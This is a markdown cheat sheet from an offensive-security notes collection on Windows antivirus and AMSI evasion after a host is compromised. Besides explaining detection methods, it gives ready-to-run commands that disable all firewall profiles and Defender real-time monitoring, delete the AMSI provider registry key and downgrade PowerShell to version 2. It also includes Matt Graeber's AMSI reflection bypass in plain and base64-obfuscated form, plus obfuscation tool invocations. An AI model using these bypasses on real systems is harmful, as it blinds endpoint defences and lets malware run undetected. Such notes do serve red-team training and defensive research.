killchain-compendium/post_exploitation/docs/windows/antivirus_evasion.md

Antivirus Evasion

• Existing types

  • On-Disk evasion
  • In-Memory evasion

• Detection Methods

  • Static Detection -- Hash or String/Byte Matching
  • Dynamic -- predefined rules, run inside a sandbox, querying API and syscalls at runtime
  • Heuristic / Behaviourial Detection -- threshold hits by either static comparison of decompiled code or dynamically analyzed software

• Additional Features

  • Unpacker -- decrypting and decompress
  • PE header parser -- portable executable headers are parsed
  • Emulation -- analysis in an emulated env

Enumeration

wmic /namespace:\\root\securitycenter2 path antivirusproduct
Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct

Get-Service WinDefend
Get-MpComputerStatus | select RealTimeProtectionEnabled

• Check firewall

Get-NetFirewallProfile | Format-Table Name, Enabled

Get-NetFirewallRule | select DisplayName, Enabled, Description

• Check inbound port availability

Test-NetConnection -ComputerName 127.0.0.1 -Port 80

• Check Windows Defender and its active rules

powershell -c "Get-MpPreference"
powershell -c "Get-MpPreference | Select-Object -ExpandProperty AttackSurfaceReductionRules_Id

• Check tamper protection, and bypass

reg query "HKLM\Software\Microsoft\Windows Defender\Features" /v TamperProtection

Reset Options

Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False

Anti Malware Secure Interface

• Powershell .NET runtime detection measure of windows. Scans code before executed.

• https://docs.microsoft.com/en-us/windows/win32/amsi/

• https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-functions

• https://docs.microsoft.com/en-us/windows/win32/api/amsi/nn-amsi-iamsistream

• Integrated inside components

  • User Account Control (UAC)
  • Powershell
  • Windows Script Host (wscript, csrcipt)
  • JavaScript and VBScript
  • VBA macros

• System.Management.Automation.dll

• Flow

               |          Win32 API              |         COM API            |         AV Provider        |
Interpreter --> AMSIScanBuffer --> AMSIScanString --> IAntiMalware::Scan() --> IAntiMalwareProvider::Scan()

Return Result/Response Codes

AMSI_RESULT_CLEAN = 0
AMSI_RESULT_NOT_DETECTED = 1
AMSI_RESULT_BLOCKED_BY_ADMIN_START = 16384
AMSI_RESULT_BLOCKED_BY_ADMIN_END = 20479
AMSI_RESULT_DETECTED = 32768

PowerShell Downgrade Attack

• Downgrade Powershell version to 2.0, where no AMSI is implemented

PowerShell -Version 2

• Unicorn does leverage this

Reflection Bypass

• Varying string concatenation and camelCasing variations of the following string by Matt Graeber
• Matt Graeber's Reflection

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

or an obfuscated version

[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)
Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse
Set-MpPreference -DisableRealtimeMonitoring $true

AMSI ScanBuffer patch

• Patching amsi.dll, which is loaded at Powershell startup

• AMSI ScanBuffer is delivered to amsi.dll

• Get handle of amsi.dll

• Get process address of AmsiScanBuffer

• Modify mem protection of AmsiScanBuffer

• Write opcode to AMSIScanBuffer

• BC-Security's AMSI bypass

• RastaMouse's AMSI bypass

Other Bypasses and Tools

• S3cur3Th1sSh1t

• amsifail generates obfuscated snippets

Validate

• AMSITrigger identifies strings which trigger the AMSI functions
• Validate Obfuscation and check which strings trigger AMSI
• AMSITrigger Repo

.\\AMSITrigger.exe -u <URL> -f 1

or

.\\AMSITrigger.exe -i <file> -f 1

Further Obfuscation

• String concatenation

$OBF = 'Ob' + 'fu' + 's' +'cation'

• Concatenate - ('co'+'ffe'+'e')
• Reorder - ('{1}{0}'-f'ffee','co')
• Whitespace - ( 'co' +'fee' + 'e')

Type Obfuscation

• .NET has type accelerators as aliases for types to shorten them and break the signature.

• idera

• 0x00-0x00

• Documentation at microsoft

• Example

  • Without

[system.runtime.interopservices.marshal]::copy($buf, 0, $BufferAddress, 6);

* With

[dorkstork]::copy($buf, 0, $BufferAddress, 6);

Automated Obfuscation

Powershell

• Invoke-Obfuscation
• Daniel's guide to Invoke-Obfuscation

Invoke-Obfuscation -ScriptBlock {'Payload Here'} -Command 'Token\\String\\1,2,\\Whitespace\\1' -Quiet -NoExit

• 8191 character limit of command prompt must not be exceeded.

Other Obfuscation

• Pinpoint bytes that will be flagged with ThreadCheck
  • Has to be build via VS. Will output a ddll, an excutable and an XML file.
  • ThreatCheck.exe -f <file>
• DefenderCheck

Links

• cmnatic
• cmnatic's diss
• s3cur3th1ssh1t
• amsi.fail